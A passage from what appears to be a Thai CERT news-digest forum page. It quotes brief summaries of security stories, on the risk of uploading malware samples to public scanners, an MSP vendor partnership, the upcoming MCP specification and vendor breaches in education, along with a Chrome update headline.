        "Submitting a suspicious file to VirusTotal or MalwareBazaar places a copy of that file on a platform other people can search. Analysts across the industry rely on these services to get a quick verdict on whether a binary is dangerous. The convenience carries a condition many overlook. Once a sample reaches a public repository, the person who wrote it can locate it there. Skilled operators watch these platforms for the hashes of their own tools, and a match tells them their campaign has been detected. Files tied to a targeted intrusion can also carry sensitive material from the victim, which then sits on a third-party system."
        https://www.helpnetsecurity.com/2026/06/26/burnyard-local-malware-analysis/
        https://arxiv.org/pdf/2606.24778
      • Two CEOs On Why Security And AI Readiness Belong Together
        "SuperOps and Guardz are bundling PSA, RMM, MDM, and agentic SecOps into one offering for MSPs. In this Help Net Security Q&A, SuperOps CEO Arvind Parthiban and Guardz CEO Dor Eisner explain how a connected stack cuts the time and context lost to tool-switching, lowers costs against multi-vendor setups, and helps close the gap between average MSP margins of 8% and the 18% top performers reach. They also discuss what makes a platform AI-native, and why they treat security readiness and AI readiness as one conversation."
        https://www.helpnetsecurity.com/2026/06/26/superops-guardz-ceo-partnership/
      • The New MCP Specification: What Security Teams Must Prepare For
        "The upcoming MCP 2026-07-28 specification represents the most significant architectural evolution of the Model Context Protocol (MCP) since it began. What began as a local, single-user AI integration tool is transforming into a platform capable of supporting enterprise-scale, cloud native deployments. Following the release candidate published on May 21, 2026, the final specification is scheduled for release on July 28, 2026, accompanied by a formal 12-month deprecation window for select legacy functionality."
        https://www.akamai.com/blog/security-research/new-mcp-specification-security-teams-must-prepare
        https://www.securityweek.com/new-enterprise-ready-mcp-specification-brings-new-security-challenges/
      • Third-Party Breaches Teach Education Sector a Costly Lesson In Vendor Risk
        "Cybercriminals have long viewed the education sector, with its mix of legacy technology and new applications, uneven IT resources, and large amounts of data, as an easy and enticing target. From the smallest rural K-12 districts to the world's most prestigious universities, IT professionals in education are focused on getting and keeping students and staff online, rather than protecting the systems their devices run on. Many have slim security budgets and are chronically understaffed. And the vast amounts of operational and personal data they hold could be ransomed or sold for use in future cybercrimes."
        https://www.darkreading.com/cyber-risk/third-party-breaches-teaches-education-lesson-vendor-risk

      References

      Electronic Transactions Development Agency (ETDA)

      Posted in Cyber Security News
      NCSA_THAICERT
    • Google releases Chrome 149 update fixing 18 serious vulnerabilities


      Follow the news on the webboard or on Facebook NCSA Thailand

      Posted in Cyber Security News
      NCSA_THAICERT